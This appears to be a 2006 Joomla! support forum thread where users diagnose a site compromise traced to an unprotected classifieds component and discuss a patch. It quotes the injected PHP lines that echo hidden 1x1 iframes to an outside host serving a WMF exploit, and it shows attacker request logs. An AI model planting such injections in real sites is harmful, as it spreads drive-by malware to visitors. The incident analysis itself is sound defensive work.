Site Hacked

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
shiftsrl
Joomla! Explorer
Joomla! Explorer
Posts: 269
Joined: Fri Aug 26, 2005 11:05 am
Location: Como - Italy
Contact:

Site Hacked

Post by shiftsrl » Thu Aug 03, 2006 9:31 am

Now it's ok but my site was hacked by someone. I've noticed that the file mod_mainmenu.php was hacked and inside someone added an iframe that goes to http://zchxsikpgz.biz/dl/xpladv521.wmf that is a Exploit.WMF.A.

My Joomla version is 1.0.10. How was that possible?

As soon as I can I'll post the mod_mainmenu.php modified. I've overwritten the hacked on with a fresh one and now everything is ok.

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Site Hacked

Post by infograf768 » Thu Aug 03, 2006 9:40 am

Please list here the 3pds extensions you are using, as well as their version number.
Please also look here for known 3pds vulnerabilities and their upgrade if available.
http://forum.joomla.org/index.php/topic,79477.0.html

Changing the mod_mainmenu.php file will not help you as you have to figure first how your site was hacked in order to prevent it in the future.
Last edited by infograf768 on Thu Aug 03, 2006 9:42 am, edited 1 time in total.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
shiftsrl
Joomla! Explorer
Joomla! Explorer
Posts: 269
Joined: Fri Aug 26, 2005 11:05 am
Location: Como - Italy
Contact:

Re: Site Hacked

Post by shiftsrl » Thu Aug 03, 2006 9:48 am

You're right but at least I've restored the site functionality. Here's the list of components. I've seen that I've performs and maybe they've used this one to hack the site. I've deleted it.
You do not have the required permissions to view the files attached to this post.

User avatar
shiftsrl
Joomla! Explorer
Joomla! Explorer
Posts: 269
Joined: Fri Aug 26, 2005 11:05 am
Location: Como - Italy
Contact:

Re: Site Hacked

Post by shiftsrl » Thu Aug 03, 2006 9:55 am

Here are the lines added to my mod_mainmenu.php

Code: Select all

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>'; if (!defined( '_MOS_MAINMENU_MODULE' )) {

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Site Hacked

Post by infograf768 » Thu Aug 03, 2006 10:05 am

Be sure to delete all related files by ftp and check the modification dates for other files.

OT: I see sef_advance is displayed twice, and that, instead of JCE, you are using the older mce.

Also, docman is a versin RC1 and not RC2.
Last edited by infograf768 on Thu Aug 03, 2006 10:07 am, edited 1 time in total.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
Aspegic
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Wed Sep 07, 2005 5:49 pm

Re: Site Hacked

Post by Aspegic » Sat Aug 05, 2006 11:00 am

@shiftsrl:

I do not know if you've resolved the issue yet or not, but today I was contacted by the administrator of a joomla site running on our server. He reported the exact same hack as you described (modified mod_mainmenu.php to include iframe to some site).

I searched the logfiles for his site and found the following lines:

Code: Select all

82.207.99.8 - - [04/Aug/2006:11:06:51 +0200] "GET //administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14196 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:06:52 +0200] "GET //administrator/components/com_classifieds/popups/insert_image.php HTTP/1.0" 200 18502 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:21:50 +0200] "POST /administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14198 "-" "Mozilla/4.0 (compatible; Synapse)"
82.207.99.8 - - [04/Aug/2006:11:21:52 +0200] "GET /components/com_classifieds/adimages/config.php HTTP/1.0" 200 5 "-" "Mozilla/4.0"
This looked suspicious to me. A direct link to images.php? From an IP address in the Ukraine? I assume there aren't too many Ukranians who speak dutch (it's a dutch website).

I found that the direct URL does indeed allow direct execution of images.php, bypassing normal joomla security. That file, as well as a few other php files in that folder are missing some of the standard joomla security checks (like "defined( '_VALID_MOS' ) or die( 'Restricted access' );" for example). I'm not a joomla expert but I assume this is the cause of the vulnerability.

I still need the do several more checks to see if this is indeed the cause of the problem, but at the moment it sure looks like it. Since you posted that you're also running com_classifieds the same vulnerability may also be the cause of your problem.

HTH

Cheers,
Aspegic
Last edited by Aspegic on Sat Aug 05, 2006 11:07 am, edited 1 time in total.

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Site Hacked

Post by infograf768 » Sat Aug 05, 2006 2:03 pm

February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
Aspegic
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Wed Sep 07, 2005 5:49 pm

Re: Site Hacked

Post by Aspegic » Sat Aug 05, 2006 2:36 pm

infograf768 wrote: February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html
I do believe that thread discussus a different classifieds component called "Noah". The one installed on the website on our server used the classifieds component available at mambo.posluh.hr

The snapshot posted earlier by shiftsrl - showing the 3rd party components he has installed on his site - shows he uses the same version as was installed on my clients site: "Classifieds v1.3 M451".

I visited mambo.posluh.hr and it appears Classifieds version 1.3 M451 is currently the latest release available from that website (released january 2005). The download from their website still contains the php scripts without the necessary security checks.

Cheers,
Aspegic
Last edited by Aspegic on Sat Aug 05, 2006 2:49 pm, edited 1 time in total.

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Site Hacked

Post by infograf768 » Sat Aug 05, 2006 3:03 pm

Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/

The security patch is clearly shown.

Hope it helps
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
Aspegic
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Wed Sep 07, 2005 5:49 pm

Re: Site Hacked

Post by Aspegic » Sat Aug 05, 2006 3:29 pm

infograf768 wrote: Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
Thanks for the link. I'll pass it along to my client.

Cheers,
Aspegic

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Site Hacked

Post by infograf768 » Sat Aug 05, 2006 3:43 pm

Aspegic wrote:
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
That old mambo site has not beem updated since april 2005.
It is dead I guess.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

mauri
Joomla! Intern
Joomla! Intern
Posts: 64
Joined: Mon Aug 22, 2005 6:47 pm

Re: Site Hacked

Post by mauri » Sat Aug 05, 2006 5:09 pm

Maybe RobS takes this component to his list too ;D

dcramb
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Wed Aug 09, 2006 10:16 pm

Re: Site Hacked

Post by dcramb » Wed Aug 09, 2006 10:22 pm

infograf768 wrote:
Aspegic wrote:
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
That old mambo site has not beem updated since april 2005.
It is dead I guess.
Hi, I have have just been made aware of this hack to one of my sites. I use the Classifieds component so downloaded the patch from the link above. However if you look at the two files in the patch the fix is negated by the line:

define( "_VALID_MOS", 1 );

Very strange. You need to comment this out, I believe

Kindred
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Thu Aug 18, 2005 8:43 pm
Contact:

Re: Site Hacked

Post by Kindred » Thu Aug 10, 2006 5:18 am

not only comment that out...  but add the following lines at the start of the file, just after the source commentary:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

dcramb
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Wed Aug 09, 2006 10:16 pm

Re: Site Hacked

Post by dcramb » Thu Aug 10, 2006 6:52 am

I think, this line:

require( "../../../../includes/auth.php" );  // Thx 2 Lismo

adds the important

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

However I see there are other files that don't have any protection. I am going to remove this component.

User avatar
shiftsrl
Joomla! Explorer
Joomla! Explorer
Posts: 269
Joined: Fri Aug 26, 2005 11:05 am
Location: Como - Italy
Contact:

Re: Site Hacked

Post by shiftsrl » Sat Aug 12, 2006 4:28 pm

Thanks for the info. In my case I think that the problem was the component PerForms wich I've deleted. In any case I've patched also the classified but a question still remains. Is this component secure with the patch or not?

dc006
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Sep 14, 2005 12:15 pm

Re: Site Hacked

Post by dc006 » Sun Sep 10, 2006 11:58 pm

Hi,
I have same problem with this component. Have also been hacked by Inserting Iframe.

I use this component a lot. Does anyone have any sugestion on this?

Is anybody out there whou could check security of this component adn posibly fix the security issues?

deleted user

Re: Site Hacked

Post by deleted user » Tue Aug 21, 2007 3:23 am

Has anyone every developed com_classified further? Any security issues still on this?


Locked

Return to “Security - 1.0.x”